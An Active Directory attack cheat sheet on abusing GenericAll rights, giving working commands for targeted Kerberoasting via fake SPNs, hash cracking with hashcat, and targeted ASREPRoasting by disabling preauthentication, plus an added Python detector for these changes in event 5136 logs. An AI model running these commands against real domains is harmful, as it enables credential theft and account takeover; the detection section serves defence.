GenericAll
Over a User
Targeted Kerberoasting
targetedKerberoast extracts Kerberoast hashes by abusing write access to set temporary SPNs on users without one, then removes them. It works on all users, a list, or a single user:
targetedKerberoast.py -v -d '<domain>' -u '<user>' -p '<pass>' --request-user '<target-account>'
When a group/user has GenericAll rights over another account, a fake SPN can be assigned to the target account:
# Credentialed object for the currently owned user
> $SecPass = ConvertTo-SecureString "<password>" -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $SecPass)
# Create a fake SPN for the target user
> Set-ADUser -Identity "<target-user>" -Credential $Cred -Add @{ServicePrincipalName='fake/http'}
Once the SPN is assigned to the target account, we can Kerberoast it and crack its hash:
# Kerberoast the target account
impacket-GetUserSPNs <domain>/<username>:<password> -request-user <target-user> -dc-ip <dc-ip>
# Crack the hash
hashcat -m13100 fake_spn_hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Targeted ASREPRoasting
We can disable pre-authentication for the target account and then ASREPRoast it:
# Toggle the DONT_REQ_PREAUTH flag (4194304) in userAccountControl (PowerView)
Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}
# Set "Do not require Kerberos preauthentication" with the AD PS module
Get-ADUser <USER> | Set-ADAccountControl -DoesNotRequirePreAuth $true
# Confirm that it worked
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'
An example of the above method can be found here.
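Both techniques above leave directory-change records on the domain controller. The following is an added detection example (not from the original page or from any tool it names) that correlates Windows Security event 5136 records to spot an SPN that is added to a user object and removed again shortly after, and a userAccountControl change that newly sets the 4194304 bit. It assumes "Audit Directory Service Changes" and a matching SACL are in place so that 5136 is logged; the sample events, account names and the `rec` and `find_roasting_setup` helpers are constructed for illustration.

```python
from datetime import datetime, timedelta

ADDED, DELETED = "%%14674", "%%14675"  # 5136 OperationType: Value Added / Value Deleted
DONT_REQ_PREAUTH = 0x400000            # 4194304, the userAccountControl bit from the page

def rec(time, actor, dn, attr, value, op, cls="user"):
    """Build one record using the field names of a 5136 event's EventData."""
    return {"time": time, "SubjectUserName": actor, "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value, "OperationType": op}

# Constructed sample events; every name and value here is made up for the example.
EVENTS = [
    rec("2024-05-01T10:00:02", "jdoe", "CN=svc-a,DC=corp,DC=example", "servicePrincipalName", "fake/http", ADDED),
    rec("2024-05-01T10:00:09", "jdoe", "CN=svc-a,DC=corp,DC=example", "servicePrincipalName", "fake/http", DELETED),
    rec("2024-05-01T11:00:00", "dbadmin", "CN=sqlsvc,DC=corp,DC=example", "servicePrincipalName", "MSSQLSvc/db01.corp.example:1433", ADDED),
    rec("2024-05-01T12:00:00", "jdoe", "CN=bob,DC=corp,DC=example", "userAccountControl", "512", DELETED),
    rec("2024-05-01T12:00:00", "jdoe", "CN=bob,DC=corp,DC=example", "userAccountControl", "4194816", ADDED),
    rec("2024-05-01T13:00:00", "helpdesk", "CN=alice,DC=corp,DC=example", "userAccountControl", "512", DELETED),
    rec("2024-05-01T13:00:00", "helpdesk", "CN=alice,DC=corp,DC=example", "userAccountControl", "514", ADDED),
]

def find_roasting_setup(events, window=timedelta(minutes=5)):
    """Return (reason, actor, target DN) for user-object changes that enable roasting."""
    findings, spn_added, old_uac = [], {}, {}
    for e in sorted(events, key=lambda e: e["time"]):  # stable sort keeps same-second order
        if e["ObjectClass"] != "user":                 # machine accounts log as "computer"
            continue
        actor, dn, op = e["SubjectUserName"], e["ObjectDN"], e["OperationType"]
        attr, value = e["AttributeLDAPDisplayName"].lower(), e["AttributeValue"]
        ts = datetime.fromisoformat(e["time"])
        if attr == "serviceprincipalname":
            if op == ADDED:
                spn_added[(actor, dn, value)] = ts
            elif op == DELETED and ts - spn_added.pop((actor, dn, value), datetime.min) <= window:
                findings.append(("temporary-spn", actor, dn))
        elif attr == "useraccountcontrol":
            if op == DELETED:      # 5136 logs the old value as deleted, then the new one as added
                old_uac[dn] = int(value)
            elif op == ADDED and int(value) & DONT_REQ_PREAUTH and not old_uac.get(dn, 0) & DONT_REQ_PREAUTH:
                findings.append(("preauth-disabled", actor, dn))
    return findings

if __name__ == "__main__":
    for finding in find_roasting_setup(EVENTS):
        print(finding)
```

An SPN that is added and left in place, as in the Set-ADUser variant, does not match the add/remove pair; catching it needs a separate rule that compares SPN additions on user objects against an allowlist of known service accounts.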
Change user's password
See here.
Over a Group
Add User to the Group
This can be done using native commands, the AD PS module, or PowerView.
Over an OU
If a group has GenericAll rights over an OU, then the group members can be assigned GenericAll rights over the OU as well, which results in them having FullControl over the OU members. This gives the ability to change any OU user's password.